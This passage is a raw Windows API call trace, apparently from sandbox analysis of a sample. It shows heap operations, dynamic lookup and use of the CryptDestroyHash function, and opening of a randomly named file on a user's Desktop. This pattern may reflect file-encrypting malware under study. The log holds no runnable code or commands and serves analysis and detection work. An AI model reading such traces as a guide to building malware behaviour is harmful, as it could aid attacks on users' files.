hHeap=0x2af0000) returned 1 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7200 [0086.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0086.674] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.674] CryptDestroyHash (hHash=0x9a3cc0) returned 1 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0086.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0086.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0086.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0086.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0086.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/0LCfOxpKhBY.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\0lcfoxpkhby.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0086.680] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.680] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0086.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0086.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 